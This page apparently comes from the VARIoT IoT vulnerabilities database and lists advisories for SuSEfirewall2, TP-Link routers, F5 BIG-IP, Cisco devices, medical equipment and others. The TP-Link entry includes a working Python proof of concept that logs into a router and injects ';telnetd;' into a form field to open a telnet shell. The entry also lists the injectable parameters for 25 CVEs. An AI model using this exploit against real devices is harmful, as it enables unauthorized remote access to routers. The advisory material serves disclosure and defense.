VARIoT IoT vulnerabilities database

The SuSEfirewall2 package before 3.6.312-2.13.1 in SUSE Linux Enterprise (SLE) Desktop 12 SP2, Server 12 SP2, and Server for Raspberry Pi 12 SP2; before 3.6.312.333-3.10.1 in SLE Desktop 12 SP3 and Server 12 SP3; before 3.6_SVNr208-2.18.3.1 in SLE Server 11 SP4; before 3.6.312-5.9.1 in openSUSE Leap 42.2; and before 3.6.312.333-7.1 in openSUSE Leap 42.3 might allow remote attackers to bypass intended access restrictions on the portmap service by leveraging a missing source net restriction for _rpc_ services. SuSEfirewall2 The package contains vulnerabilities related to authorization, permissions, and access control.Information is obtained and service operation is interrupted (DoS) There is a possibility of being put into a state. SUSE Linux Enterprise (SLE) Desktop, etc. are all products of SUSE Corporation in the United States. SUSE Linux Enterprise (SLE) Desktop is an enterprise-level Linux desktop version system. SLE Server is a server version of Linux system. SuSEfirewall2 package is one of the packages with network data filtering function. There are security vulnerabilities in the SuSEfirewall2 package in many SUSE products. A remote attacker can exploit this vulnerability to bypass the access restrictions of the port forwarding service

TP-Link WVR, WAR and ER devices allow remote authenticated administrators to execute arbitrary commands via command injection in the new-ipgroup variable in the session_limits.lua file. TP-Link WVR , WAR ,and ER The device contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. TP-LinkWVR, WAR and ERdevices are different series of router products from China TP-LINK. Security vulnerabilities exist in TP-LinkWVR, WAR, and ER devices. These vulnerabilities can be triggered in LAN and WAN(if the "remote management" function is enabled). Vulnerability Type: ================ Command Injection (Authenticated) Product: ================ We has tested these vulnerabilities on TL-WVR450L(the latest version is TL-WVR450L V1.0161125) and TL-WVR900G(TL-WVR900G V3.0_170306). And the following model should also be affected and the vendor has confirmed: TP-Link ER5110G, TP-Link ER5120G, TP-Link ER5510G, TP-Link ER5520G, TP-Link R4149G, TP-Link R4239G, TP-Link R4299G, TP-Link R473GP-AC, TP-Link R473G, TP-Link R473P-AC, TP-Link R473, TP-Link R478G+, TP-Link R478, TP-Link R478+, TP-Link R483G, TP-Link R483, TP-Link R488, TP-Link WAR1300L, TP-Link WAR1750L, TP-Link WAR2600L, TP-Link WAR302, TP-Link WAR450L, TP-Link WAR450, TP-Link WAR458L, TP-Link WAR458, TP-Link WAR900L, TP-Link WVR1300G, TP-Link WVR1300L, TP-Link WVR1750L, TP-Link WVR2600L, TP-Link WVR300, TP-Link WVR302, TP-Link WVR4300L, TP-Link WVR450L, TP-Link WVR450, TP-Link WVR458L, TP-Link WVR900G, TP-Link WVR900L CVE details: ================ The detail of each vulnerability are as follows: CVE-2017-15613: new-interface variable in the cmxddns.lua file CVE-2017-15614: new-outif variable in the pptp_client.lua file CVE-2017-15615: lcpechointerval variable in the pptp_client.lua file CVE-2017-15616: new-interface variable in the phddns.lua file CVE-2017-15617: iface variable in the interface_wan.lua file CVE-2017-15618: new-enable variable in the pptp_client.lua file CVE-2017-15619: pptphellointerval variable in the pptp_client.lua file CVE-2017-15620: new-zone variable in the ipmac_import.lua file CVE-2017-15621: olmode variable in the interface_wan.lua file CVE-2017-15622: new-mppeencryption variable in the pptp_client.lua file CVE-2017-15623: new-enable variable in the pptp_server.lua file CVE-2017-15624: new-authtype variable in the pptp_server.lua file CVE-2017-15625: new-olmode variable in the pptp_client.lua file CVE-2017-15626: new-bindif variable in the pptp_server.lua file CVE-2017-15627: new-pns variable in the pptp_client.lua file CVE-2017-15628: lcpechointerval variable in the pptp_server.lua file CVE-2017-15629: new-tunnelname variable in the pptp_client.lua file CVE-2017-15630: new-remotesubnet variable in the pptp_client.lua file CVE-2017-15631: new-workmode variable in the pptp_client.lua file CVE-2017-15632: new-mppeencryption variable in the pptp_server.lua file CVE-2017-15633: new-ipgroup variable in the session_limits.lua file CVE-2017-15634: name variable in the wportal.lua file CVE-2017-15635: max_conn variable in the session_limits.lua file CVE-2017-15636: new-time variable in the webfilter.lua file CVE-2017-15637: pptphellointerval variable in the pptp_server.lua file Credits: ================ chunibalon, puzzor @VARAS of IIE Timeline: ================ 2017.08 to 2017.09: Issues found. 2017.09.26: Vendor contacted. 2017.10.13: Vendor confirmed. 2017.10.14: CVE id requested. 2017.10.19: CVE id assigned. 2018.1: Vendor confirmed that all effected products have been fixed. Vulnerability detail: ================ These vulnerability are caused by the similar reason, so here is an explanation of CVE-2017-15616. Other vulnerabilities can be reproduced with the detail descriptions of the variable and lua file. In /usr/lib/lua/luci/controller/admin/phddns.lua file, line 113: *********************************** function add_phddns(http_form) local form_data = json.decode(http_form.data) local jdata = form_data.params.new ret = form:insert(CONFIG_NAME, "phddns", jdata, RULE_KEYS, nil) if not ret then return false, err.ERR_COM_TABLE_ITEM_UCI_ADD end if not uci_r:commit(CONFIG_NAME) then return false, err.ERR_COM_UCI_COMMIT end -- add the ref of interface ifs.update_if_reference(jdata.interface, 1) sys.fork_exec('/etc/init.d/phddns restart') userconfig.cfg_modify() return jdata end *********************************** This file will process a POST request from the web management panel with url "ip/cgi-bin/luci/;stok=xxx/admin/phddns?form=phddns". The interface argument passed by the POST request can be set with the malformed command payload and the lua file didn't check the argument sufficiently. Then the malformed value of "interface" argument causes the command injection vulnerability. PoC file: ================ *********************************** import requests import urllib import json # This is the PoC code of authenticated command injection of TP-Link WVR900G router with the CVE-2017-15616. # To reproduce the PoC, the ip of the router should be 192.168.123.1 and the password of web management panel should be 'adminadmin' PASSWORD = 'c6564879eda92681404fb4ce64343788e47d266c490bb9d574f4467644a2f96b73ec157bbffabb50752c46f55d026ec7ef34661d7dcb030b0b1fa527173093ae4358f4740e539322f58c441ea0003978475346fb66320f749cc138f867bc0d8d9501f1613524fbba565979d95df6ef412837dee15a6dd8867d00b91c6f4a3406' BASEURL = 'http://192.168.123.1' LOGINURL = BASEURL + '/cgi-bin/luci/;stok=/login?form=login' MARK = '###' VULURL = BASEURL + '/cgi-bin/luci/;stok=%s/admin/phddns?form=phddns' % (MARK) headers = { "Accept": "application/json, text/javascript, */*; q=0.01", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4", "Connection": "keep-alive", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "Host": BASEURL[7:], "Origin": BASEURL, "Referer": "%s/webpages/login.html" % (BASEURL), "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36", "X-Requested-With": "XMLHttpRequest" } login_data_value = {'method': 'login','params': {'password': PASSWORD,'username': 'admin'}} login_data = {'data':json.dumps(login_data_value)} s = requests.Session() s.headers.update(headers) print (LOGINURL) print (login_data) res = s.post(LOGINURL, data=login_data) stok = eval(res.text)['result']['stok'] print '[*] stok is %s' % (stok) tmp_vul = VULURL.replace(MARK, stok) print '[*] vul_url is %s ' % (tmp_vul) delete_data = {"method":"delete","params":{"key":"key-0","index":"0"}} delete_data = {'data': json.dumps(delete_data)} print '[+] delete existed rule' res = s.post(tmp_vul, data=delete_data) print '[*] response is: %s' % (res.text) # after executing this payload, the router will open its telnetd service. payload = ''';telnetd;''' vul_data = {"method":"add","params":{"index":0,"old":"add","new":{"interface":"WAN1%s" % (payload),"name":"test1","passwd":"test","enable":"on"},"key":"add"}} vul_data = {'data': json.dumps(vul_data)} print '[+] sending payload' res = s.post(tmp_vul, data=vul_data) print '[*] response is: %s' % (res.text) *********************************** Reference: ================ https://github.com/chunibalon/Vulnerability/blob/master/CVE-2017-15613_to_CVE-2017-15637.txt

In F5 BIG-IP LTM, AAM, AFM, Analytics, APM, ASM, DNS, GTM, Link Controller, PEM, and WebSafe 11.5.1 HF6 through 11.5.4 HF4, 11.6.0 through 11.6.1 HF1, and 12.0.0 through 12.1.2 on VIPRION platforms only, the script which synchronizes SafeNet External Network HSM configuration elements between blades in a clustered deployment will log the HSM partition password in cleartext to the "/var/log/ltm" log file. plural F5 BIG-IP The product contains a vulnerability related to information disclosure from log files.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Multiple F5 BIG-IP products are prone to a local information-disclosure vulnerability. Successful exploits may allow an attacker to obtain sensitive information that may lead to further attacks. Failed exploit attempts will result in a denial of service condition. F5 BIG-IP LTM, etc. F5 BIG-IP LTM is a local traffic manager; BIG-IP AAM is an application acceleration manager. The following products and versions are affected: F5 BIG-IP LTM version 12.0.0 to version 12.1.2, version 11.6.0 to version 11.6.1 HF1, version 11.5.1 HF6 to version 11.5.4; BIG-IP AAM 12.0. 0 to 12.1.2, 11.6.0 to 11.6.1 HF1, 11.5.1 HF6 to 11.5.4; BIG-IP AFM 12.0.0 to 12.1.2, 11.6.0 to 11.6 .1 HF1 releases, 11.5.1 HF6 releases to 11.5.4 releases; BIG-IP Analytics 12.0.0 releases to 12.1.2 releases, 11.6.0 releases to 11.6.1 HF1 releases, 11.5.1 HF6 releases to 11.5.4 releases Versions; BIG-IP APM 12.0.0 to 12.1.2, 11.6.0 to 11.6.1 HF1, 11.5.1 HF6 to 11.5.4; BIG-IP ASM 12.0.0 to 12.1.2 Versions, 11.6.0 to 11.6.1 HF1, 11.5.1 HF6 to 11.5.4; BIG-IP DNS 12.0.0 to 12.1.2; BIG-IP GTM 11.6.0 to 11.6.1 HF1 version, 11.5.1 HF6 version to 11.5.4 version; BIG-IP Link Controller version 12.0.0 to 12.1.2 version, 11.6.0 version to 11.6.1 HF1 version, 11.5.1 HF6 version to 11.5.4 version ; BIG-IP PEM version 12.0.0 to 12.1.2, 11.6.0 to 11.6.1 HF1, 11.5.1 HF6 to 11.5.4; BIG-IP Websafe 12.0.0 to 12.1.2 , 11.6.0 version to 11.6.1 HF1 version

The Cisco AMP For Endpoints application allows an authenticated, local attacker to access a static key value stored in the local application software. The vulnerability is due to the use of a static key value stored in the application used to encrypt the connector protection password. An attacker could exploit this vulnerability by gaining local, administrative access to a Windows host and stopping the Cisco AMP for Endpoints service. Cisco Bug IDs: CSCvg42904. Vendors have confirmed this vulnerability Bug ID CSCvg42904 It is released as.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Local attackers may exploit this issue to gain elevated privileges. The program analyzes malware behavior and intent, the impact of threats, defense methods, and more

The JMX server embedded in Apache James, also used by the command line client is exposed to a java de-serialization issue, and thus can be used to execute arbitrary commands. As James exposes JMX socket by default only on local-host, this vulnerability can only be used for privilege escalation. Release 3.0.1 upgrades the incriminated library. Apache James Server Contains a vulnerability in the deserialization of unreliable data.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Apache James is prone to an arbitrary command-execution vulnerability. This may aid in further attacks. Apache James versions prior to 3.0.1 are affected

In SpiderControl MicroBrowser Windows XP, Vista 7, 8 and 10, Versions 1.6.30.144 and prior, an uncontrolled search path element vulnerability has been identified which could be exploited by placing a specially crafted DLL file in the search path. If the malicious DLL is loaded prior to the valid DLL, an attacker could execute arbitrary code on the system. SpiderControl MicroBrowser Contains a vulnerability related to uncontrolled search path elements.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. MicroBrowser is a touch screen operating system. SpiderControl MicroBrowser is prone to a remote code-execution vulnerability. SpiderControl MicroBrowser 1.6.30.144 and prior versions are vulnerable

Haiwell Cloud SCADA is an industrial automation monitoring and management platform software based on .NET Framework developed by Xiamen Haiwell Technology Co., Ltd. The Haiwell Cloud SCADA Android APP has an arbitrary account password reset vulnerability. The attacker can reset any account password by capturing the bursting verification code

Haiwell Cloud SCADA is an industrial automation monitoring and management platform software based on .NET Framework developed by Xiamen Haiwell Technology Co., Ltd. Haiwell Cloud SCADA Android APP has a password bypass vulnerability. The attacker intercepts the data packet by capturing the packet, and replaces it with the constructed password data packet to bind any other mobile phone. http://www.haiwell.com/news/615-cn.htmlHaiwell Cloud SCADA system cloud configuration software Android APP has a password bypass vulnerability

Boston Scientific ZOOM LATITUDE PRM Model 3120 uses a hard-coded cryptographic key to encrypt PHI prior to having it transferred to removable media. CVSS v3 base score: 4.6; CVSS vector string: AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N. ZOOM LATITUDE PRMs is a Boston Scientific Scientific portable cardiac management system for communication with implantable cardiac pacemakers and defibrillators deployed in the healthcare and public health sectors. A hard-coded encryption information-disclosure vulnerability 2. An information-disclosure vulnerability Attackers can exploit these issues to obtain potentially sensitive information. Information obtained may aid in further attacks

Boston Scientific ZOOM LATITUDE PRM Model 3120 does not encrypt PHI at rest. CVSS v3 base score: 4.6; CVSS vector string: AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N. ZOOM LATITUDE PRMs is a Boston Scientific Scientific portable cardiac management system for communication with implantable cardiac pacemakers and defibrillators deployed in the healthcare and public health sectors. A hard-coded encryption information-disclosure vulnerability 2. An information-disclosure vulnerability Attackers can exploit these issues to obtain potentially sensitive information. Information obtained may aid in further attacks

Huawei mobile phones Honor V9 with the software versions before Duke-AL20C00B195 have an App Lock bypass vulnerability. An attacker could perform specific operations to bypass the App Lock to use apps on a target mobile phone. Huawei smartphone Honor V9 The software contains vulnerabilities related to security functions.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. HuaweiHonorV9 is a smartphone product from China's Huawei company. A security vulnerability exists in versions prior to HuaweiHonorV9Duke-AL20C00B195. Huawei Mobile Phones are prone to a local security-bypass vulnerability. Attackers can exploit this issue to bypass certain security restrictions to perform unauthorized actions. This may aid in further attacks

On FiberHome routers, Directory Traversal exists in /cgi-bin/webproc via the getpage parameter in conjunction with a crafted var:page value. FiberHome The router contains a path traversal vulnerability.Information may be obtained. FiberHomerouters is a router from China FiberHome. An attacker could exploit the vulnerability to obtain files on the router

All versions prior to V2.06.00.00 of ZTE ZXDT22 SF01, an monitoring system of ZTE energy product, are impacted by directory traversal vulnerability that allows remote attackers to read arbitrary files on the system via a full path name after host address. ZTE ZXDT22 SF01 Contains a path traversal vulnerability.Information may be obtained. ZTEZXDT22SF01 is a DC power supply unit of China ZTE Corporation (ZTE). A directory traversal vulnerability exists in versions prior to ZTEZXDT22SF012.06.00.00. A remote attacker can exploit this vulnerability to read any file on the system

A vulnerability in the Python scripting subsystem of Cisco NX-OS Software could allow an authenticated, local attacker to escape the Python parser and gain unauthorized access to the underlying operating system of the device. The vulnerability exists due to insufficient sanitization of user-supplied parameters that are passed to certain Python functions within the scripting sandbox of the affected device. An attacker could exploit this vulnerability to escape the scripting sandbox and execute arbitrary commands on the underlying operating system with the privileges of the authenticated user. To exploit this vulnerability, an attacker must have local access and be authenticated to the targeted device with administrative or Python execution privileges. These requirements could limit the possibility of a successful exploit. This vulnerability affects the following Cisco products if they are running Cisco NX-OS Software: Multilayer Director Switches, Nexus 2000 Series Fabric Extenders, Nexus 3000 Series Switches, Nexus 3500 Platform Switches, Nexus 5000 Series Switches, Nexus 5500 Platform Switches, Nexus 5600 Platform Switches, Nexus 6000 Series Switches, Nexus 7000 Series Switches, Nexus 7700 Series Switches, Nexus 9000 Series Switches - Standalone, NX-OS mode, Nexus 9500 R-Series Line Cards and Fabric Modules. Cisco Bug IDs: CSCvb86832, CSCvd86474, CSCvd86479, CSCvd86484, CSCvd86490, CSCve97102, CSCvf12757, CSCvf12804, CSCvf12815, CSCvf15198. Cisco NX-OS The software contains an input validation vulnerability. Vendors have confirmed this vulnerability Bug ID CSCvb86832 , CSCvd86474 , CSCvd86479 , CSCvd86484 , CSCvd86490 , CSCve97102 , CSCvf12757 , CSCvf12804 , CSCvf12815 ,and CSCvf15198 It is released as.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Cisco NX-OS software is a data center-level operating system that reflects modular design, resiliency, and maintainability. Cisco Multilayer Director Switches, etc. are all products of Cisco (Cisco). Cisco Multilayer Director Switches is a switch product. NX-OS Software is an operating system used in it. Python scripting subsystem is one of the Python scripting subsystems. The vulnerability stems from the fact that the program does not adequately filter the parameters submitted by users

In the 3CX Phone System 15.5.3554.1, the Management Console typically listens to port 5001 and is prone to a directory traversal attack: "/api/RecordingList/DownloadRecord?file=" and "/api/SupportInfo?file=" are the vulnerable parameters. An attacker must be authenticated to exploit this issue to access sensitive information to aid in subsequent attacks. 3CX Phone System Contains a path traversal vulnerability.Information may be obtained

China Mobile and Routing APP is a mobile phone supporting service software for He · Routing. China Mobile and routing APP have ftp backdoor vulnerability. The vulnerability is caused by the ftp account password being written into the application, An attacker can use the vulnerability to obtain ftp account information, log in to the route to obtain information about its stored files, and further use it to log in to telnet.

ZTE E8810 is a dual-band 11ac intelligent cloud router. CSRF vulnerability exists in ZTE E8810 wireless router. Allows an attacker to hijack the administrator and restore the router to factory settings.

A vulnerability in the web console of the Cisco Cloud Services Platform (CSP) 2100 could allow an authenticated, remote attacker to interact maliciously with the services or virtual machines (VMs) operating remotely on an affected CSP device. The vulnerability is due to weaknesses in the generation of certain authentication mechanisms in the URL of the web console. An attacker could exploit this vulnerability by browsing to one of the hosted VMs' URLs in Cisco CSP and viewing specific patterns that control the web application's mechanisms for authentication control. An exploit could allow the attacker to access a specific VM on the CSP, which causes a complete loss of the system's confidentiality, integrity, and availability. This vulnerability affects Cisco Cloud Services Platform (CSP) 2100 running software release 2.1.0, 2.1.1, 2.1.2, 2.2.0, 2.2.1, or 2.2.2. Cisco Bug IDs: CSCve64690. Vendors have confirmed this vulnerability Bug ID CSCve64690 It is released as.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. An attacker can exploit this issue to bypass the security mechanism and gain unauthorized access. This may lead to further attacks. web console is one of the web console programs

A vulnerability in the implementation of Session Initiation Protocol (SIP) functionality in Cisco Small Business SPA51x Series IP Phones could allow an unauthenticated, remote attacker to cause an affected device to become unresponsive, resulting in a denial of service (DoS) condition. The vulnerability is due to the improper handling of SIP request messages by an affected device. An attacker could exploit this vulnerability by sending malformed SIP messages to an affected device. A successful exploit could allow the attacker to cause the affected device to become unresponsive, resulting in a DoS condition that persists until the device is restarted manually. This vulnerability affects Cisco Small Business SPA51x Series IP Phones that are running Cisco SPA51x Firmware Release 7.6.2SR1 or earlier. Cisco Bug IDs: CSCvc63982. Vendors have confirmed this vulnerability Bug ID CSCvc63982 It is released as.Service operation interruption (DoS) There is a possibility of being put into a state. An attacker can exploit this issue to cause a denial-of-service condition, denying service to legitimate users

A vulnerability in the implementation of Session Initiation Protocol (SIP) functionality in Cisco Small Business SPA50x, SPA51x, and SPA52x Series IP Phones could allow an unauthenticated, remote attacker to cause an affected device to become unresponsive, resulting in a denial of service (DoS) condition. The vulnerability is due to the improper handling of SIP request messages by an affected device. An attacker could exploit this vulnerability by using formatted specifiers in a SIP payload that is sent to an affected device. A successful exploit could allow the attacker to cause the affected device to become unresponsive, resulting in a DoS condition that persists until the device is restarted manually. This vulnerability affects Cisco Small Business SPA50x, SPA51x, and SPA52x Series IP Phones that are running firmware release 7.6.2SR1 or earlier. Cisco Bug IDs: CSCvc63986. Vendors have confirmed this vulnerability Bug ID CSCvc63986 It is released as.Service operation interruption (DoS) There is a possibility of being put into a state